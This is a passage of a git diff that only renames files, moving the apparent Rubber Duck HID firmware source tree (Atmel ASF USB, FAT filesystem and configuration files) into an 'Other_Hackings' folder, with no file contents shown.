b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/usbb/usbb_device.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/usbb/usbb_device.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/usbb/usbb_device.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/usbb/usbb_device.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/usbb/usbb_device.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/usbb/usbb_device.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/usbb/usbb_device.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/usbb/usbb_otg.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/usbb/usbb_otg.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/usbb/usbb_otg.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/usbb/usbb_otg.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fat.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fat.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fat.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fat.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fat.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fat.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fat.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fat.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fat_unusual.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fat_unusual.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fat_unusual.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fat_unusual.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/file.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/file.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/file.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/file.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/file.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/file.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/file.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/file.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fs_com.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fs_com.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fs_com.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/fs_com.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/navigation.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/navigation.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/navigation.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/navigation.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/navigation.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/navigation.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/navigation.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/services/fs/fat/navigation.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/compiler.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/compiler.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/compiler.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/compiler.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/linker_scripts/at32uc3b/0256/gcc/link_uc3b0256.lds b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/linker_scripts/at32uc3b/0256/gcc/link_uc3b0256.lds similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/linker_scripts/at32uc3b/0256/gcc/link_uc3b0256.lds rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/linker_scripts/at32uc3b/0256/gcc/link_uc3b0256.lds diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/parts.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/parts.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/parts.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/parts.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/mrepeat.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/mrepeat.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/mrepeat.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/mrepeat.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/preprocessor.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/preprocessor.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/preprocessor.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/preprocessor.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/stringz.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/stringz.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/stringz.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/stringz.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/tpaste.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/tpaste.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/tpaste.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/preprocessor/tpaste.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/startup/startup_uc3.S b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/startup/startup_uc3.S similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/startup/startup_uc3.S rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/startup/startup_uc3.S diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/startup/trampoline_uc3.S b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/startup/trampoline_uc3.S similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/startup/trampoline_uc3.S rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/startup/trampoline_uc3.S diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/startup/trampoline_uc3.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/startup/trampoline_uc3.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/startup/trampoline_uc3.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/startup/trampoline_uc3.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/status_codes.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/status_codes.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/status_codes.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/utils/status_codes.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/boards/board.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/boards/board.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/boards/board.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/boards/board.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/genclk.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/genclk.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/genclk.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/genclk.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/osc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/osc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/osc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/osc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/pll.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/pll.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/pll.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/pll.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/sysclk.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/sysclk.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/sysclk.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/sysclk.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/genclk.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/genclk.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/genclk.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/genclk.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/osc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/osc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/osc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/osc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/pll.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/pll.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/pll.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/pll.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/sysclk.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/sysclk.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/sysclk.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/sysclk.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/sysclk.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/sysclk.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/sysclk.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/clock/uc3b0_b1/sysclk.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/sleepmgr/sleepmgr.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/sleepmgr/sleepmgr.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/sleepmgr/sleepmgr.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/sleepmgr/sleepmgr.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/sleepmgr/uc3/sleepmgr.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/sleepmgr/uc3/sleepmgr.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/sleepmgr/uc3/sleepmgr.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/sleepmgr/uc3/sleepmgr.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/sleepmgr/uc3/sleepmgr.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/sleepmgr/uc3/sleepmgr.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/sleepmgr/uc3/sleepmgr.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/sleepmgr/uc3/sleepmgr.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/storage/ctrl_access/ctrl_access.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/storage/ctrl_access/ctrl_access.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/storage/ctrl_access/ctrl_access.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/storage/ctrl_access/ctrl_access.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/storage/ctrl_access/ctrl_access.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/storage/ctrl_access/ctrl_access.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/storage/ctrl_access/ctrl_access.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/storage/ctrl_access/ctrl_access.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_conf.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_conf.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_conf.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_conf.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/udi_hid.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/udi_hid.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/udi_hid.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/udi_hid.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/udi_hid.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/udi_hid.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/udi_hid.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/device/udi_hid.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/usb_protocol_hid.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/usb_protocol_hid.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/usb_protocol_hid.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/class/hid/usb_protocol_hid.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udc.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udc.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udc.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udc.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udc_desc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udc_desc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udc_desc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udc_desc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udd.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udd.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udd.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udd.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udi.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udi.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udi.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/udc/udi.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/usb_atmel.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/usb_atmel.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/usb_atmel.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/usb_atmel.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/usb_protocol.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/usb_protocol.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/usb_protocol.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/services/usb/usb_protocol.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/utils/interrupt.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/utils/interrupt.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/utils/interrupt.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/utils/interrupt.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/utils/interrupt/interrupt_avr32.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/utils/interrupt/interrupt_avr32.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/utils/interrupt/interrupt_avr32.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/common/utils/interrupt/interrupt_avr32.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_access.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_access.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_access.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_access.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_board.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_board.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_board.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_board.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_clock.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_clock.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_clock.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_clock.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_explorer.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_explorer.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_explorer.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_explorer.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_sd_mmc_spi.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_sd_mmc_spi.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_sd_mmc_spi.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_sd_mmc_spi.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_sleepmgr.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_sleepmgr.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_sleepmgr.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_sleepmgr.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_usb.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_usb.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_usb.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/config/conf_usb.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/main.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/main.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/main.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/main.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/main.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/main.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/main.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/main.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/Makefile b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/Makefile similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/Makefile rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/Makefile diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.eep b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.eep similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/Debug/duck.eep rename to 